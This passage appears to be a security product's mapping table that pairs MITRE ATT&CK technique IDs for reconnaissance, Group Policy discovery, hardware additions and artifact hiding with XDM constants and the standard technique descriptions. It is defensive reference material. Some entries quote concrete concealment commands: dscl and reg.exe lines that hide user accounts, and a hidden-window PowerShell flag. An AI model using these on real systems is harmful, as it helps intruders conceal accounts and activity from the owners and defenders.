T1590 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION Adversaries may gather information about the victim's networks that can be used during targeting.
Information about networks may include a variety of details, including administrative data (ex: IP ranges,
domain names, etc.) as well as specifics regarding its topology and operations. Adversaries may gather this
information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/
techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information
about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search
Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS
Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms
of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open
Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex:
[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://
attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/
techniques/T1199)). https://attack.mitre.org/techniques/T1590

T1590.002 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_DNS Adversaries may gather information about the victim's DNS that can be used during targeting. DNS
information may include a variety of details, including registered name servers as well as records that
outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this
information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://
attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or
other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/
T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal
opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://
attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/
T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources
(ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure]
(https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://
attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1590/002

T1590.001 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_DOMAIN_PROPERTIES Adversaries may gather information about the victim's network domain(s) that can be used during targeting.
Information about domains and their properties may include a variety of details, including what domain(s)
the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable
information such as contacts (email addresses and phone numbers), business addresses, and name
servers. Adversaries may gather this information in various ways, such as direct collection actions via
[Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://
attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be
exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/
techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://
attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/
T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/
T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex:
[Phishing](https://attack.mitre.org/techniques/T1566)). https://attack.mitre.org/techniques/T1590/001

T1590.005 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_IP_ADDRESSES Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses
may be allocated to organizations by block, or a range of sequential addresses. Information about assigned
IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may
also enable an adversary to derive other details about a victim, such as organizational size, physical
location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active
Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/
techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via
online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/
techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this
information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://
attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/
T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/
T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex:
[External Remote Services](https://attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/
T1590/005

T1590.006 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_NETWORK_SECURITY_APPLIANCES Adversaries may gather information about the victim's network security appliances that can be used during
targeting. Information about network security appliances may include a variety of details, such as the
existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may
also target information about victim network-based intrusion detection systems (NIDS) or other appliances
related to defensive cybersecurity operations. Adversaries may gather this information in various ways,
such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or
[Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS)
Information about network security appliances may also be exposed to adversaries via online or other
accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains]
(https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities]
(https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/
T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/006
Original Mapped Description

T1590.004 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_NETWORK_TOPOLOGY Adversaries may gather information about the victim's network topology that can be used during targeting.
Information about network topologies may include a variety of details, including the physical and/or logical
arrangement of both external-facing and internal network environments. This information may also include
specifics regarding network devices (gateways, routers, etc.) and other infrastructure. Adversaries may
gather this information in various ways, such as direct collection actions via [Active Scanning](https://
attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Information about network topologies may also be exposed to adversaries via online or other accessible
data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS
Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex:
[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/
Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire
Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://
attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://
attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1590/004

T1590.003 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_NETWORK_TRUST_DEPENDENCIES Adversaries may gather information about the victim's network trust dependencies that can be used during
targeting. Information about network trusts may include a variety of details, including second or third-party
organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and
potentially elevated) network access. Adversaries may gather this information in various ways, such as
direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about
network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search
Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active
Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://
attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://
attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/
T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://
attack.mitre.org/techniques/T1590/003

T1591 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION Adversaries may gather information about the victim's organization that can be used during targeting.
Information about an organization may include a variety of details, including the names of divisions/
departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for
Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be
exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/
techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).
(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may
reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://
attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/
T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/
T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex:
[Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/
techniques/T1199)). https://attack.mitre.org/techniques/T1591

T1591.002 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION_BUSINESS_RELATIONSHIPS Adversaries may gather information about the victim's business relationships that can be used during
targeting. Information about an organization’s business relationships may include a variety of details,
including second or third-party organizations/domains (ex: managed service providers, contractors, etc.)
that have connected (and potentially elevated) network access. This information may also reveal supply
chains and shipment paths for the victim’s hardware and software resources. Adversaries may gather this
information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/
techniques/T1598). Information about business relationships may also be exposed to adversaries via online
or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search
Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for
Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://
attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://
attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by
Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/
techniques/T1199)). https://attack.mitre.org/techniques/T1591/002

T1591.001 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION_DETERMINE_PHYSICAL_LOCATIONS Adversaries may gather the victim's physical location(s) that can be used during targeting. Information
about physical locations of a target organization may include a variety of details, including where key
resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or
authorities the victim operates within. Adversaries may gather this information in various ways, such as
direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations
of a target organization may also be exposed to adversaries via online or other accessible data sets (ex:
[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://
attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR
Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex:
[Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains]
(https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities]
(https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/
T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware
Additions](https://attack.mitre.org/techniques/T1200)). https://attack.mitre.org/techniques/T1591/001

T1591.003 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION_IDENTIFY_BUSINESS_TEMPO Adversaries may gather information about the victim's business tempo that can be used during targeting.
Information about an organization’s business tempo may include a variety of details, including operational
hours/days of the week. This information may also reveal times/dates of purchases and shipments of the
victim’s hardware and software resources. Adversaries may gather this information in various ways, such
as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information
about business tempo may also be exposed to adversaries via online or other accessible data sets (ex:
[Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://
attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may
reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://
attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/
T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/
T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex:
[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://
attack.mitre.org/techniques/T1199)) https://attack.mitre.org/techniques/T1591/003

T1591.004 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION_IDENTIFY_ROLES Adversaries may gather information about identities and roles within the victim organization that can be
used during targeting. Information about business roles may reveal a variety of targetable details, including
identifiable information for key personnel as well as what data/resources they have access to. Adversaries
may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://
attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries
via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001)
or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost
Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance
(ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/
Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish
Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/
techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). https://
attack.mitre.org/techniques/T1591/004

T1615 XDM_CONST.MITRE_TECHNIQUE_GROUP_POLICY_DISCOVERY Adversaries may gather information on Group Policy settings to identify paths for privilege escalation,
security measures applied within a domain, and to discover patterns in domain objects that can be
manipulated or used to blend in the environment. Group Policy allows for centralized management of user
and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy
settings made up of files stored within a predicable network path \ \SYSVOL\ \Policies\ .(Citation:
TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use
commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO
and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft
gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on
behaviors, including determining potential attack paths within the target network as well as opportunities to
manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/
T1484)) for their benefit. https://attack.mitre.org/techniques/T1615
Original Mapped Description

T1200 XDM_CONST.MITRE_TECHNIQUE_HARDWARE_ADDITIONS Adversaries may introduce computer accessories, computers, or networking hardware into a system or
network that can be used as a vector to gain access. While public references of usage by threat actors are
scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and
open source products can be leveraged with capabilities such as passive network tapping (Citation:
Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/
techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck
Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless
access to an existing network (Citation: McMillan Pwn March 2012), and others. https://attack.mitre.org/
techniques/T1200

T1564 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating
systems may have features to hide various artifacts, such as important system files and administrative task
execution, to avoid disrupting user work environments and prevent users from changing files or features on
the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts,
or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX
Pirrit)(Citation: MalwareBytes ADS July 2015) Adversaries may also attempt to hide artifacts associated
with malicious behavior by creating computing regions that are isolated from common security
instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
https://attack.mitre.org/techniques/T1564

T1564.008 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_EMAIL_HIDING_RULES Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email
clients allow users to create inbox rules for various email functions, including moving emails to other
folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or
through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://
attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)
(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to
less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to
[Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised
account. Any user or administrator within the organization (or adversary with valid credentials) may be able
to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection
had the email content been immediately seen by a user or defender. Malicious rules commonly filter out
emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies
and subject lines. (Citation: Microsoft Cloud App Security) https://attack.mitre.org/techniques/T1564/008

T1564.005 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_HIDDEN_FILE_SYSTEM Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File
systems provide a structure to store and access data from physical storage. Typically, a user engages with
a file system through applications that allow them to access files and directories, which are an abstraction
from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File
systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table
(MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014) Adversaries may use their own abstracted file
system, separate from the standard file system present on the infected system. In doing so, adversaries
can hide the presence of malicious components and file input/output from security tools. Hidden file
systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One
implementation would be to store a file system in reserved disk space unused by disk structures or
standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another
implementation could be for an adversary to drop their own portable partition image as a file on top of the
standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the
existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA) https://
attack.mitre.org/techniques/T1564/005

T1564.001 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_HIDDEN_FILES_AND_DIRECTORIES Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal
users from accidentally changing special files on a system, most operating systems have the concept of a
‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using
normal commands on the command line. Users must explicitly ask to show the hidden files either via a
series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and
ls –a for Linux and macOS). On Linux and Mac, users can mark specific files as hidden simply by putting
a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated
Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the
Finder application and standard command-line utilities like “ls”. Users must specifically change settings to
have these files viewable. Files on macOS can also be marked with the UF_HIDDEN flag which prevents
them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).
On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications
create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace.
For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a
typical user or system analysis that does not incorporate investigation of hidden files. https://
attack.mitre.org/techniques/T1564/001

T1564.002 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_HIDDEN_USERS Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal
users may want to hide users when there are many users accounts on a given system or want to keep an
account hidden from the other users on the system. In macOS, every user account has a userID associated
with it. When creating a user, you can specify the userID for that account. There is a property value in /
Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs
500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/
techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username
UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts.
(Citation: Cybereason OSX Pirrit) In Windows, adversaries may hide user accounts via settings in the
Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://
attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login
screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.
(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A) https://attack.mitre.org/
techniques/T1564/002

T1564.003 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_HIDDEN_WINDOW Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some
cases, windows that would typically be displayed when an application carries out an operation can be
hidden. This may be utilized by system administrators to avoid disrupting user work environments when
carrying out administrative tasks. On Windows, there are a variety of features in scripting languages in
Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic]
(https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is
powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019) Similarly, on macOS the
configurations for how applications run are listed in property list (plist) files. One of the tags in these files
can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from
appearing in the Dock. A common use for this is when applications run in the system tray, but don't also
want to show up in the Dock. Adversaries may abuse these functionalities to hide otherwise visible windows
from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac
Malware) https://attack.mitre.org/techniques/T1564/003

T1564.004 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_NTFS_FILE_ATTRIBUTES Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every
New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains
a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT
entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes
(EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present],
that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul
2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS
Mar 2014) Adversaries may store malicious data or binaries in file attribute metadata instead of directly in
files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.
(Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015) https://
attack.mitre.org/techniques/T1564/004
Original Mapped Description

T1564.009 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_RESOURCE_FORKING Adversaries may abuse resource forks to hide malicious code or executables to evade detection and
bypass security applications. A resource fork provides applications a structured way to store resources
such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical
File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes,
using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the
application bundle structure. Non-localized resources are placed at the top level directory of an application
bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)
(Citation: ELC Extended Attributes) Adversaries can use resource forks to hide malicious data that may
otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a
specified offset, that is moved to an executable location then invoked. Resource fork content may also be
obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau
bundlore erika noerenberg 2020) https://attack.mitre.org/techniques/T1564/009

T1564.006 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_RUN_VIRTUAL_INSTANCE Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of
virtualization technologies exist that allow for the emulation of a computer or computing environment. By
running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their
behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally,
depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the
virtual instance can be difficult to trace back to the compromised host as the IP address and hostname
might not match known values.(Citation: SingHealth Breach Jan 2019) Adversaries may utilize native
support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox
binaries). After running a virtual instance, adversaries may create a shared folder between the guest and
host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos
Ragnar May 2020) https://attack.mitre.org/techniques/T1564/006

T1564.007 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_VBA_STOMPING Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office
documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each
module stream has a PerformanceCache that stores a separate compiled version of the VBA source code
known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT
stream (which contains the version-dependent description of the VBA project) matches the version of the
host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream) An
adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign
code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious
VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA
source code is removed, some tools might even think that there are no macros present. If there is a version
match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed,
otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing
malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation:
FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev) https://attack.mitre.org/techniques/
T1564/007

T1574 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW Adversaries may execute their own malicious payloads by hijacking the way operating systems run
programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution
may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade
